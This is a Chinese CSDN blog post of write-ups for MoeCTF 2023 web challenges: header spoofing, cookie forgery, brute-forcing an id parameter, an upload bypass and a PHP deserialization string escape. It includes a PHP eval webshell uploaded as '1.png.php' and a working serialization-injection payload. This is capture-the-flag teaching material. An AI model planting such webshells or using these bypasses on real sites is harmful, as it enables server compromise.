[MoeCTF 2023] web题解

最新推荐文章于 2024-05-26 12:07:30 发布
最新推荐文章于 2024-05-26 12:07:30 发布
阅读量366 收藏 1
点赞数
分类专栏: CTF比赛 文章标签: 前端 php web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132272978
版权

文章目录

web

http

连接到本地后,题目给了我们任务
在这里插入图片描述

  1. 第一个是要求我们GET传参UwU=u
  2. 第二个是要求我们POST传参Luv=u
  3. 第三个是要求我们cookie值为admin
  4. 第四个是要求我们来自127.0.0.1
  5. 第五个是要求我们用MoeBrowser浏览器

在此之前先要学会用bp抓本地包
我们win+R打开cmd,然后输入

ipconfig

将下面的ip复制,把题目的localhost改掉,即可抓本地包
在这里插入图片描述
bp抓包,添加我们的参数,得到flag

在这里插入图片描述

cookie

打开题目,按照给的提示
我们先到./register,POST传参json数据

{
    "username":"dog",
    "password":"123456"
}

在这里插入图片描述

然后再到./login登陆一下

{
    "username":"dog",
    "password":"123456"
}

在这里插入图片描述查看./flag,结果不行
在这里插入图片描述
尝试注册admin用户发现已存在,结合提示可以修改cookie值
抓包./status,将token解码发现是加密过的

在这里插入图片描述我们修改一下roleadmin,再次编码,尝试在./status替换原来的token
然后访问./flag发现还是不行,于是直接访问./flag抓包修改cookie值
得到flag

在这里插入图片描述

彼岸的flag

打开题目(F12发现巨佬博客,原来是web前端知识)
发现有问题
在这里插入图片描述

直接选取元素,得到flag
在这里插入图片描述

moe图床

文件上传类型的题目
然后F12发现只允许上传png格式

if (!file){
   alert('请选择一个文件进行上传!');
   return;
}
   const allowedExtensions = ['png'];
   const fileExtension = file.name.split('.').pop().toLowerCase();
   if (!allowedExtensions.includes(fileExtension)) {
      alert('只允许上传后缀名为png的文件!');
      return;
}

分析一下

const allowedExtensions = ['png'];

定义了一个名为 allowedExtensions 的数组,其中包含允许上传的文件扩展名。在这个例子中,只允许上传扩展名为 ‘png’ 的文件。

const fileExtension = file.name.split('.').pop().toLowerCase();

从 file 对象中提取文件扩展名。它使用 split() 方法根据点 (.) 分隔符将文件名拆分为数组,并使用 pop() 获取结果数组的最后一个元素,该元素表示文件扩展名。toLowerCase() 方法将文件扩展名转换为小写,以进行大小写不敏感的比较。

这样看只需要我们上传的文件名里面包含png的拓展名即可绕过
前提,我们还只能上传png绕过js前端检测

我们创建1.png

<?php @eval($_POST[shell]);?>

然后bp抓包修改文件名为1.png.php,上传成功
在这里插入图片描述

然后蚁剑连接

在这里插入图片描述

得到flag

在这里插入图片描述

大海捞针

打开题目,给了提示
在这里插入图片描述应该说的是GET传参id可以连接到不同宇宙,id的值从1到1000
一个个找太麻烦了,结合提示
在这里插入图片描述应该是要爆破
我们直接bp抓包丢到instruder,添加payload位置
在这里插入图片描述
设置payload集为从1到1000

在这里插入图片描述开始爆破,发现?id=676的长度最特殊,猜测有flag
在这里插入图片描述
我们直接访问,发现是另外一道题彼岸的flag出现过的
直接查看页面源代码,搜索一下得到flag
在这里插入图片描述

夺命十三枪

源代码

 <?php
highlight_file(__FILE__);

require_once('Hanxin.exe.php');

$Chant = isset($_GET['chant']) ? $_GET['chant'] : '夺命十三枪';

$new_visitor = new Omg_It_Is_So_Cool_Bring_Me_My_Flag($Chant);

$before = serialize($new_visitor);
$after = Deadly_Thirteen_Spears::Make_a_Move($before);
echo 'Your Movements: ' . $after . '<br>';

try{
    echo unserialize($after);
}catch (Exception $e) {
    echo "Even Caused A Glitch...";
}
?>
Your Movements: O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"Nobody";}
Far away from COOL...

我们再看下Hanxin.exe.php

 <?php

if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
    highlight_file(__FILE__);
}

class Deadly_Thirteen_Spears{
    private static $Top_Secret_Long_Spear_Techniques_Manual = array(
        "di_yi_qiang" => "Lovesickness",
        "di_er_qiang" => "Heartbreak",
        "di_san_qiang" => "Blind_Dragon",
        "di_si_qiang" => "Romantic_charm",
        "di_wu_qiang" => "Peerless",
        "di_liu_qiang" => "White_Dragon",
        "di_qi_qiang" => "Penetrating_Gaze",
        "di_ba_qiang" => "Kunpeng",
        "di_jiu_qiang" => "Night_Parade_of_a_Hundred_Ghosts",
        "di_shi_qiang" => "Overlord",
        "di_shi_yi_qiang" => "Letting_Go",
        "di_shi_er_qiang" => "Decisive_Victory",
        "di_shi_san_qiang" => "Unrepentant_Lethality"
    );

    public static function Make_a_Move($move){
        foreach(self::$Top_Secret_Long_Spear_Techniques_Manual as $index => $movement){
            $move = str_replace($index, $movement, $move);
        }
        return $move;
    }
}

class Omg_It_Is_So_Cool_Bring_Me_My_Flag{

    public $Chant = '';
    public $Spear_Owner = 'Nobody';

    function __construct($chant){
        $this->Chant = $chant;
        $this->Spear_Owner = 'Nobody';
    }

    function __toString(){
        if($this->Spear_Owner !== 'MaoLei'){
            return 'Far away from COOL...';
        }
        else{
            return "Omg You're So COOOOOL!!! " . getenv('FLAG');
        }
    }
}

?>

分析一下

  1. 我们先看到出口Omg_It_Is_So_Cool_Bring_Me_My_Flag.__toString(),只要满足Spear_Owner为MaoLei就可得到flag
  2. 往前推,当使用echo或者print输出对象时会调用此方法,源代码的echo 'Your Movements: ' . $after . '<br>';刚好满足

但是我们实例化Omg_It_Is_So_Cool_Bring_Me_My_Flag()后,可以发现Spear_Owner的值我们是修改不了的。这就是个问题,我们怎么做到修改一个不可被修改的值呢

关键点在于Deadly_Thirteen_Spears.Make_a_Move(),同时结合我们的目的,我们可以利用字符串逃逸来实现绕过

我们先随便传入test
在这里插入图片描述我们的目标是

O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"MaoLei";}

我们尝试把";s:11:"Spear_Owner";s:6:"MaoLei";}写到Chant里面,然后把后面的部分挤掉
同时长度变为4+35

O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:39:"test";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}

这时候我们利用替换前后长度差与之相等
这里我选的是构造7*(di_qi_qiang),因为当它被替换后长度差为5,5*7刚好为我们要的
只要做到下面这样就可以得到flag,长度为39+35

O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:74:"di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}

所以payload为

?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

得到flag
在这里插入图片描述

_rev1ve
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
ICPC2023 西安区域赛 题解.pdf
11-09
ICPC2023 西安区域赛 题解.pdf
MoeCTF2023_Web
m0_75094067的博客
10-14 496
MoeCTF2023_Web(moeworld)
[MoeCTF 2023]——Web方向详细Write up、Re、Misc、Crypto部分Writeup
Leaf_initial的博客
10-19 1162
将url地址复制然后打开即可得到flag。
moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2468
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web PythonmoeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
Moectf2021web题解
qq_45845771的博客
09-27 1263
[toc] eeeeeeeeeeezunserialize 知识点: pop链的构造:主要看这篇文章https://paper.seebug.org/1480/ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7fWdPkQI-1632746009325)(C:\Users\yuan\AppData\Roaming\Typora\typora-user-images\image-20210906180953364.png)] POC <?php class entra
CCPC-Online-2023-题解.pdf
08-20
CCPC-Online-2023-题解.pdf
西普WEB大部分题解
12-09
西普WEB大部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
2023.9.9题解fdafafasffas
09-09
2023.9.9题解fdafafasffas
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
vue源码之mustache模板引擎1
qweasl_的博客
05-21 425
模板引擎的一个有点:它是将数据转为视图的最优雅的方法。相信vue的玩家首先想到的是。而还没学vue的朋友,就只能进行dom操作了。通过数组的join方法。以及es6推出的模板字符串。
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1243
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【详细介绍WebKit的结构】
cz88888888666的博客
05-23 526
WebKit是一个开源的浏览器引擎,主要用于渲染网页内容,它最初由苹果公司为其Safari浏览器开发,目前被多种浏览器和应用程序使用,包括所有基于iOS和macOS的浏览器,WebKit的设计目标是提供快速、精准且流畅的网页浏览体验。
golang websocket 发送消息莫名其妙断开的问题记录
qq_38189542的博客
05-20 235
公司需要做个B/S架构的前端展示项目,当前以为是小case,但是在实现后端功能的时候,还是被坑了。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 1071
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
python前端通过API接口调用与后端进行数据交互前端如何调用api接口通过关键词获取电商平台热销商品数据
2301_78159247的博客
05-23 488
请求参数:q=女装&start_price=0&end_price=0&page=1&cat=0&discount_only=&sort=&page_size=&seller_info=&nick=&ppath=&imgid=&filter=参数说明:q:搜索关键字。
Web Speech API(2)—— SpeechSynthesis
LiangRZ
05-21 962
Web Speech API 有两个部分:SpeechSynthesis 语音合成(文本到语音 TTS)和 SpeechRecognition 语音识别(异步语音识别)。语音合成 (也被称作是文本转为语音,英语简写是 tts) 包括接收 app 中需要语音合成的文本,再在设备麦克风播放出来这两个过程。其中包含了将由语音服务朗读的内容,以及如何朗读它(例如:语种、音高、音量)。语音合成服务的控制器接口,可用于获取设备上可用的合成语音,开始、暂停以及其他相关命令的信息。控制器,从而获取语音合成功能的入口。
axios如何传递数组作为参数,后端又如何接收呢????
qq_64847107的博客
05-25 203
前端的参数是一个数组。
amis 文件上传 & 大文件分块上传
最新发布
qq_42152032的博客
05-26 744
在信息安全领域,经常会用到MD5、SHA1、SHA256算法。这三种算法都属于散列算法,或者叫作哈希算法。它们具有输入任意长度,输出长度固定,以及单向性(无法根据散列值还原出消息)的特点。关于MD5MD5是一个安全散列算法,输入两个不同的明文不会得到相同的输出值,根据输出值,不能得到原始的明文,即其过程是不可逆的。所以要解密MD5没有现成的算法,只能穷举法,把可能出现的明文,用MD5算法散列之后,把得到的散列值和原始的数据形成一个一对一的映射表,通过匹配从映射表中找出破解密码所对应的原始明文。
2023国赛C题解题思路
09-09
2023国赛C题的解题思路如下: 首先,我们需要理解题目的要求。假设题目要求我们解决一个问题,我们需要根据给定的输入数据,输出相应的结果。 接下来,我们需要分析题目给出的输入数据和要求的输出结果之间的关系。仔细阅读题目描述和样例输入输出,理解题目的背景和限制条件。 然后,我们可以开始思考解题的步骤和算法。这可能包括使用递归、动态规划、图论等算法思想来解决问题。我们可以根据题目要求和所学知识来选择合适的算法和数据结构。 接着,我们可以开始编写代码实现解题算法。在实现过程中,我们需要注意处理边界条件、输入数据的处理以及结果的输出格式。 最后,我们可以对代码进行测试和调试,确保算法的正确性和效率。我们可以使用题目给定的样例输入输出进行测试,并尝试一些边界情况来验证算法的鲁棒性。 总之,解决2023国赛C题需要理解题目要求、分析数据关系、选择合适的算法、编写代码实现和进行测试和调试。希望以上的思路能对你有所帮助!如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值